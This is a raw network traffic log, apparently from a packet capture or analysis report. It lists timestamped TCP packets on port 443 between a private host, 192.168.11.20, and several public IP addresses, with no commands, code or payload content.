Nov 1, 2024 20:57:51.903244972 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.903244972 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.903342962 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.903351068 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.903403997 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.903469086 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.906367064 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.906383038 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.906553984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.906553984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.906574965 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.906601906 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.906601906 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.906601906 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.906601906 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.906650066 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.906769037 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.907632113 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.907645941 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.907763004 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.907763004 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.907810926 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.907810926 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.907810926 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.907860041 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.907860041 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.907860041 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.907860041 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.907860994 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.907880068 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.907907009 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.908046007 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.909172058 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.909187078 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.909339905 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.909339905 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.909339905 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.909362078 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.909436941 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.909436941 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.909508944 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.909564972 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.910953999 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.910975933 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.911751032 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.911817074 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.912075996 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.912075996 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.912765980 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.912964106 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.912986040 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:54.182152987 CET	49810	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.182177067 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.182328939 CET	49810	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.182713032 CET	49810	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.182730913 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.586097002 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.586453915 CET	49810	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.586467028 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.587647915 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.587863922 CET	49810	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.591073990 CET	49810	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.591245890 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.591300964 CET	49811	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.591327906 CET	443	49811	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.591347933 CET	49812	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.591375113 CET	443	49812	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.591444969 CET	49813	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.591464043 CET	443	49813	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.591491938 CET	49812	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.591497898 CET	49811	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.591497898 CET	49810	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.591523886 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.591690063 CET	49813	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.591768980 CET	49812	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.591780901 CET	443	49812	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.591912985 CET	49811	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.591927052 CET	443	49811	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.592120886 CET	49813	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.592130899 CET	443	49813	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.643632889 CET	49810	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.806440115 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.806513071 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.806566954 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.806723118 CET	49810	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.806740999 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.806907892 CET	49810	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.809597015 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.809700966 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.809828997 CET	49810	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.809845924 CET	443	49810	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.809920073 CET	49810	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.810024977 CET	49810	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.989461899 CET	443	49812	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.989908934 CET	49812	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.989926100 CET	443	49812	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.990418911 CET	443	49812	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.990896940 CET	49812	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.990988970 CET	49812	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.991038084 CET	443	49812	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.995129108 CET	443	49811	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.995578051 CET	49811	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.995594978 CET	443	49811	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.996871948 CET	443	49811	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.997119904 CET	49811	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.997436047 CET	49811	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:54.997543097 CET	443	49811	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:54.997559071 CET	49811	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.000272036 CET	443	49813	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.000601053 CET	49813	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.000617027 CET	443	49813	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.001076937 CET	443	49813	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.001548052 CET	49813	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.001658916 CET	443	49813	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.040071964 CET	443	49811	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.043392897 CET	49813	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.043392897 CET	49812	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.043406010 CET	49811	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.043452978 CET	443	49811	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.094893932 CET	49811	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.486610889 CET	443	49812	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.486968994 CET	443	49812	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.487180948 CET	49812	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.487430096 CET	49812	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.487430096 CET	49812	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.487488985 CET	443	49812	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.487663031 CET	49812	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.488040924 CET	49813	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.532085896 CET	443	49813	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.593347073 CET	443	49813	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.593517065 CET	443	49813	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.593717098 CET	443	49813	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.593728065 CET	49813	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.593782902 CET	443	49813	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.593918085 CET	443	49813	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.594029903 CET	49813	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.594089031 CET	443	49813	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.594109058 CET	49813	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.594109058 CET	49813	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.594202042 CET	49813	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.646152973 CET	443	49811	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.646596909 CET	443	49811	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.646794081 CET	49811	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.646847963 CET	49811	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.646847963 CET	49811	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.646879911 CET	443	49811	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.647160053 CET	49811	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.655888081 CET	49814	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.655947924 CET	443	49814	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:55.656127930 CET	49814	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.656430006 CET	49814	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:55.656469107 CET	443	49814	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:56.066349030 CET	443	49814	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:56.066746950 CET	49814	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:56.066792965 CET	443	49814	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:56.068134069 CET	443	49814	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:56.068612099 CET	49814	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:56.068681002 CET	49814	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:56.068921089 CET	443	49814	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:56.118982077 CET	49814	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:56.272340059 CET	443	49814	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:56.272362947 CET	443	49814	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:56.272474051 CET	443	49814	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:56.272531986 CET	443	49814	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:56.272576094 CET	49814	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:56.273073912 CET	49814	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:56.273086071 CET	443	49814	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:56.273164034 CET	49814	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:56.273164034 CET	49814	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:56.273298979 CET	49814	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:58.398933887 CET	49816	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:58.399029970 CET	443	49816	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:58.399279118 CET	49816	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:58.399626017 CET	49816	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:58.399679899 CET	443	49816	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:58.804989100 CET	443	49816	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:58.805383921 CET	49816	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:58.805413961 CET	443	49816	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:58.806380987 CET	443	49816	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:58.807276011 CET	49816	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:57:58.807483912 CET	443	49816	142.250.65.164	192.168.11.20
Nov 1, 2024 20:57:58.854429960 CET	49816	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:58:01.227210999 CET	49820	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:01.227237940 CET	443	49820	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:01.227369070 CET	49820	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:01.227701902 CET	49820	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:01.227715969 CET	443	49820	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:01.601705074 CET	443	49820	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:01.602231026 CET	49820	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:01.602518082 CET	49820	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:01.602565050 CET	443	49820	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:01.604095936 CET	49820	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:01.604095936 CET	49820	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:01.604151964 CET	443	49820	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:01.604182005 CET	443	49820	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:02.247689009 CET	49816	443	192.168.11.20	142.250.65.164
Nov 1, 2024 20:58:02.563793898 CET	443	49820	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:02.563873053 CET	443	49820	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:02.563940048 CET	49820	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:02.564013004 CET	49820	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:02.565921068 CET	49820	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:02.565941095 CET	443	49820	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:07.273840904 CET	49821	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:07.273865938 CET	443	49821	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:07.274132013 CET	49821	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:07.274235964 CET	49821	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:07.274245977 CET	443	49821	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:07.646295071 CET	443	49821	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:07.646490097 CET	49821	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:07.646826982 CET	49821	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:07.646872044 CET	443	49821	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:07.648025036 CET	49821	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:07.648025990 CET	49821	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:07.648076057 CET	443	49821	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:07.648106098 CET	443	49821	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:08.276870012 CET	49822	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:08.276891947 CET	443	49822	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:08.277117968 CET	49822	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:08.277245045 CET	49822	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:08.277256012 CET	443	49822	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:08.376893044 CET	443	49821	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:08.377010107 CET	443	49821	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:08.377068043 CET	49821	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:08.377170086 CET	49821	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:08.377672911 CET	49821	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:08.377713919 CET	443	49821	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:08.650482893 CET	443	49822	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:08.650787115 CET	49822	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:08.651118040 CET	49822	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:08.651164055 CET	443	49822	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:08.652301073 CET	49822	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:08.652301073 CET	49822	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:08.652358055 CET	443	49822	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:08.652385950 CET	443	49822	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:08.652412891 CET	49822	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:08.652456999 CET	443	49822	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:09.349363089 CET	49823	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:09.349390030 CET	443	49823	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:09.349639893 CET	49823	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:09.349701881 CET	49823	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:09.349711895 CET	443	49823	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:09.398818970 CET	443	49822	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:09.398989916 CET	443	49822	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:09.399066925 CET	49822	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:09.399139881 CET	49822	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:09.399606943 CET	49822	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:09.399660110 CET	443	49822	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:09.723156929 CET	443	49823	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:09.723303080 CET	49823	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:09.723614931 CET	49823	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:09.723654032 CET	443	49823	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:09.725369930 CET	49823	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:09.725414038 CET	443	49823	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:10.503771067 CET	443	49823	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:10.503947973 CET	443	49823	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:10.503973007 CET	49823	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:10.504098892 CET	49823	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:10.504529953 CET	49823	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:10.504594088 CET	443	49823	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:15.566924095 CET	53120	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:15.566946030 CET	443	53120	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:15.567075014 CET	53120	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:15.567385912 CET	53120	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:15.567409992 CET	443	53120	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:15.776827097 CET	443	53120	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:15.777159929 CET	53120	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:15.777187109 CET	443	53120	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:15.779402018 CET	443	53120	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:15.779594898 CET	53120	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:15.847979069 CET	53120	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:15.848145008 CET	443	53120	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:15.902287960 CET	53120	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:15.902311087 CET	443	53120	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:15.950201988 CET	53120	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:17.590418100 CET	53120	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:17.631959915 CET	443	53120	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:17.691951036 CET	443	53120	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:17.692328930 CET	443	53120	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:17.692517996 CET	53120	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:17.692948103 CET	53120	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:17.692960024 CET	443	53120	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:17.693715096 CET	54742	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:17.693731070 CET	443	54742	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:17.693922043 CET	54742	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:17.694108963 CET	54742	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:17.694122076 CET	443	54742	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:17.886317968 CET	443	54742	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:17.886692047 CET	54742	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:17.886702061 CET	443	54742	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:17.887010098 CET	443	54742	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:17.887667894 CET	54742	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:17.887667894 CET	54742	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:17.887681007 CET	443	54742	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:17.887779951 CET	443	54742	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:17.934942961 CET	54742	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:18.082143068 CET	443	54742	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:18.082200050 CET	443	54742	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:18.082300901 CET	54742	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:18.082735062 CET	54742	443	192.168.11.20	108.139.47.92
Nov 1, 2024 20:58:18.082758904 CET	443	54742	108.139.47.92	192.168.11.20
Nov 1, 2024 20:58:18.192282915 CET	56733	443	192.168.11.20	151.101.1.44
Nov 1, 2024 20:58:18.192297935 CET	443	56733	151.101.1.44	192.168.11.20
Nov 1, 2024 20:58:18.192452908 CET	56733	443	192.168.11.20	151.101.1.44
Nov 1, 2024 20:58:18.192671061 CET	56733	443	192.168.11.20	151.101.1.44
Nov 1, 2024 20:58:18.192678928 CET	443	56733	151.101.1.44	192.168.11.20
Nov 1, 2024 20:58:18.209079981 CET	55312	443	192.168.11.20	64.202.112.31
Nov 1, 2024 20:58:18.209090948 CET	443	55312	64.202.112.31	192.168.11.20
Nov 1, 2024 20:58:18.209352970 CET	55312	443	192.168.11.20	64.202.112.31
Nov 1, 2024 20:58:18.209618092 CET	55312	443	192.168.11.20	64.202.112.31
Nov 1, 2024 20:58:18.209621906 CET	443	55312	64.202.112.31	192.168.11.20
Nov 1, 2024 20:58:18.209789991 CET	52142	443	192.168.11.20	107.23.5.106
Nov 1, 2024 20:58:18.209804058 CET	443	52142	107.23.5.106	192.168.11.20
Nov 1, 2024 20:58:18.210032940 CET	52142	443	192.168.11.20	107.23.5.106
Nov 1, 2024 20:58:18.210139990 CET	52142	443	192.168.11.20	107.23.5.106
Nov 1, 2024 20:58:18.210149050 CET	443	52142	107.23.5.106	192.168.11.20
Nov 1, 2024 20:58:18.390593052 CET	443	56733	151.101.1.44	192.168.11.20
Nov 1, 2024 20:58:18.390863895 CET	56733	443	192.168.11.20	151.101.1.44
Nov 1, 2024 20:58:18.390872002 CET	443	56733	151.101.1.44	192.168.11.20
Nov 1, 2024 20:58:18.391819000 CET	443	56733	151.101.1.44	192.168.11.20
Nov 1, 2024 20:58:18.392102957 CET	56733	443	192.168.11.20	151.101.1.44
Nov 1, 2024 20:58:18.393136024 CET	56733	443	192.168.11.20	151.101.1.44
Nov 1, 2024 20:58:18.393194914 CET	56733	443	192.168.11.20	151.101.1.44
Nov 1, 2024 20:58:18.393198967 CET	443	56733	151.101.1.44	192.168.11.20
Nov 1, 2024 20:58:18.393239021 CET	443	56733	151.101.1.44	192.168.11.20
Nov 1, 2024 20:58:18.407500029 CET	443	55312	64.202.112.31	192.168.11.20
Nov 1, 2024 20:58:18.407826900 CET	55312	443	192.168.11.20	64.202.112.31
Nov 1, 2024 20:58:18.407833099 CET	443	55312	64.202.112.31	192.168.11.20
Nov 1, 2024 20:58:18.409117937 CET	443	55312	64.202.112.31	192.168.11.20
Nov 1, 2024 20:58:18.409347057 CET	55312	443	192.168.11.20	64.202.112.31
Nov 1, 2024 20:58:18.410506010 CET	55312	443	192.168.11.20	64.202.112.31
Nov 1, 2024 20:58:18.410577059 CET	55312	443	192.168.11.20	64.202.112.31
Nov 1, 2024 20:58:18.410582066 CET	443	55312	64.202.112.31	192.168.11.20
Nov 1, 2024 20:58:18.410605907 CET	443	55312	64.202.112.31	192.168.11.20
Nov 1, 2024 20:58:18.438658953 CET	56733	443	192.168.11.20	151.101.1.44
Nov 1, 2024 20:58:18.438666105 CET	443	56733	151.101.1.44	192.168.11.20
Nov 1, 2024 20:58:18.454667091 CET	55312	443	192.168.11.20	64.202.112.31
Nov 1, 2024 20:58:18.454677105 CET	443	55312	64.202.112.31	192.168.11.20
Nov 1, 2024 20:58:18.486557007 CET	56733	443	192.168.11.20	151.101.1.44
Nov 1, 2024 20:58:18.492367983 CET	49526	443	192.168.11.20	23.199.48.23
Nov 1, 2024 20:58:18.492383957 CET	443	49526	23.199.48.23	192.168.11.20
